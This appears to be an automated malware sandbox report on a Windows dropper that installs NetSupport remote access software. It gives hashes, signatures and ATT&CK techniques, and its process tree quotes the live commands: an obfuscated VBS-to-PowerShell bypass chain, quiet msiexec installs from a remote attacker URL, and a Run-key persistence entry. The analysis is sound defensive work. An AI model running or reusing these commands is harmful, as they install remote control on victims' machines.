Analysis

  • max time kernel
    106s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    29-10-2020 16:41

General

  • Target

    signed_gate6.bin.exe

  • Size

    3.8MB

  • MD5

    5b31c8bf67eea804fa636876a1828d20

  • SHA1

    0f9862e659b5cd1233a7796d51e062d217df3c75

  • SHA256

    a61bc88a1a994952b622c7eb01bfa9be65591c8cb5e69c4dae56edbd94deb384

  • SHA512

    bf7175eb313fd1949e36056d478699327a05cbff1d5a0e68c4664df7c202197a25332ba270c8a5300367cf8d4b711d682d535071ce6c11ed125dd78c75f2909b

Malware Config

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as legitimate system administration software.

  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 8 IoCs
  • Use of msiexec (install) with remote resource 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • JavaScript code in executable 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 67 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\signed_gate6.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\signed_gate6.bin.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c ec^h^o CreateObject("Wscript.Shell").Run "cmd /c cmd /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps1", 0, False > %appdata%\NWNCDTYSWS.vb^s& wscript %appdata%\NWNCDTYSWS.vb^s& del %appdata%\NWNCDTYSWS.vb^s
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1572
      • C:\Windows\system32\wscript.exe
        wscript C:\Users\Admin\AppData\Roaming\NWNCDTYSWS.vbs
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c cmd /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps1
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:788
          • C:\Windows\system32\cmd.exe
            cmd /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps1
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1552
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps1
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1492
              • C:\Windows\system32\msiexec.exe
                "C:\Windows\system32\msiexec.exe" /i http://safuuf7774.pw/iplog/newg.php?hst=installing_TUICJFPF /q
                7⤵
                • Use of msiexec (install) with remote resource
                • Suspicious use of AdjustPrivilegeToken
                PID:552
              • C:\Windows\system32\reg.exe
                "C:\Windows\system32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v fonthost /t REG_SZ /d C:\Users\Admin\AppData\Roaming\W4mcAMtZ\fonthost.exe /f
                7⤵
                • Adds Run key to start application
                • Modifies registry key
                PID:1796
              • C:\Users\Admin\AppData\Roaming\W4mcAMtZ\fonthost.exe
                "C:\Users\Admin\AppData\Roaming\W4mcAMtZ\fonthost.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:1964
              • C:\Windows\system32\msiexec.exe
                "C:\Windows\system32\msiexec.exe" /i http://safuuf7774.pw/iplog/newg.php?hst=installed_TUICJFPF /q
                7⤵
                • Use of msiexec (install) with remote resource
                • Suspicious use of AdjustPrivilegeToken
                PID:1436
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blacklisted process makes network request
    • Suspicious use of AdjustPrivilegeToken
    PID:1792

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Persistence
    Registry Run Keys / Startup Folder (T1060): 1
  • Defense Evasion
    Modify Registry (T1112): 2

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps1

  • C:\Users\Admin\AppData\Roaming\NWNCDTYSWS.vbs

  • C:\Users\Admin\AppData\Roaming\W4mcAMtZ\HTCTL32.DLL

  • C:\Users\Admin\AppData\Roaming\W4mcAMtZ\MSVCR100.dll

  • C:\Users\Admin\AppData\Roaming\W4mcAMtZ\NSM.LIC

  • C:\Users\Admin\AppData\Roaming\W4mcAMtZ\PCICL32.dll

  • C:\Users\Admin\AppData\Roaming\W4mcAMtZ\client32.ini

  • C:\Users\Admin\AppData\Roaming\W4mcAMtZ\fonthost.exe

  • C:\Users\Admin\AppData\Roaming\W4mcAMtZ\pcicapi.dll

  • C:\Users\Admin\AppData\Roaming\W4mcAMtZ\pcichek.dll

  • \Users\Admin\AppData\Local\Temp\nsiCE29.tmp\System.dll

  • \Users\Admin\AppData\Local\Temp\nsiCE29.tmp\blowfish.dll

  • \Users\Admin\AppData\Roaming\W4mcAMtZ\HTCTL32.DLL

  • \Users\Admin\AppData\Roaming\W4mcAMtZ\PCICHEK.DLL

  • \Users\Admin\AppData\Roaming\W4mcAMtZ\PCICL32.DLL

  • \Users\Admin\AppData\Roaming\W4mcAMtZ\msvcr100.dll

  • \Users\Admin\AppData\Roaming\W4mcAMtZ\pcicapi.dll
